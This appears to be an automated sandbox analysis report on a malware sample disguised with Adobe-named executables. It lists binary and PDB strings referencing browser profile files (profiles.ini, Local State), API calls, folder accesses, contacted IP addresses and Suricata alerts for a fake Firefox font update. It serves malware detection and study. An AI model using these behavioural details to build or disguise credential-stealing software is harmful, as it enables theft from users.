Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.iniw source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbH source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: zC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdbpp5m source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ininix source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Temp\Symbols\ntkrnlmp.pdb< source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: LVkAi4PBv6.exe, 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000000.00000000.1353994334.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp, LVkAi4PBv6.exe, 00000002.00000000.1358153893.000000000060B000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdbo source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: <\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbs source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831p source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: _prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843250003.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1947218705.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: q\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.in source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: `C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb717 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121641973.0000000002EBA000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AdobeCollabSync.pdb source: AdobeSync.exe, 00000003.00000002.1388149267.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000000.1362863550.000000000013D000.00000002.00000001.01000000.00000008.sdmp, AdobeSync.exe, 00000003.00000003.1382607094.0000000001307000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000000.1387754147.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp, AdobeSync.exe, 00000004.00000002.1449776370.00000000006DD000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini3 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: 3C:\Users\user\AppData\Roaming\Adobe\ols\winload_prod.pdb) source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E0D000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1841979791.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: krnlmp.pdbF source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2209575820.0000000003CAA000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207504685.000000000226B000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211066150.00000000046A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209762640.0000000003EAF000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2209989172.00000000040A2000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2211471289.00000000048A5000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210697474.00000000044A8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2212367556.0000000004AA4000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2210314239.00000000042A9000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208117967.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2185087878.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2208560942.0000000002E1A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2186340967.0000000002E19000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb` source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2171269604.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2170693552.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2172330186.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2184765975.0000000002E19000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: AXE8SharedExpat.pdb source: AdobeSync.exe, 00000003.00000002.1394420634.000000006D350000.00000002.00000001.01000000.00000009.sdmp, AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: 4C:\Users\user\AppData\Roaming\com.adobe.dunamis_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: BIB.pdb source: AdobeSync.exe, 00000003.00000003.1383616075.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394339156.000000006D321000.00000002.00000001.01000000.0000000A.sdmp, AdobeSync.exe, 00000004.00000002.1459521925.000000006D491000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: AXE8SharedExpat.pdbppPm source: AdobeSync.exe, 00000004.00000002.1459930543.000000006D500000.00000002.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00863CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00863CC4
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_008A4440 FindFirstFileW,FindClose,0_2_008A4440
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00897B87 FindFirstFileExW,0_2_00897B87
Source: C:\Users\user\Desktop\LVkAi4PBv6.exeCode function: 0_2_00879B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00879B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_00604440 FindFirstFileW,FindClose,2_2_00604440
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,2_2_005D9B43
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005F7B87 FindFirstFileExW,2_2_005F7B87
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_005C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_005C3CC4
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D36DCB0 GetWindowsDirectoryW,lstrcmpW,lstrlenW,lstrlenW,FindFirstFileW,lstrlenW,DeleteFileW,FindNextFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_6D36DCB0
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exeCode function: 2_2_6D37DB36 FindFirstFileExW,2_2_6D37DB36
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BCE10 FindFirstFileW,3_2_000BCE10
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exeCode function: 3_2_000BBB70 FindFirstFileW,GetFullPathNameW,GetLastError,FindFirstFileW,GetLastError,FindClose,_CxxThrowException,3_2_000BBB70
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: Joe Sandbox ViewIP Address: 52.168.117.171 52.168.117.171
Source: Joe Sandbox ViewIP Address: 18.164.96.90 18.164.96.90
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49967 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50090 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50091 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50092 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50089 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50088 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50096 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50097 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50093 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50099 -> 188.114.97.3:443
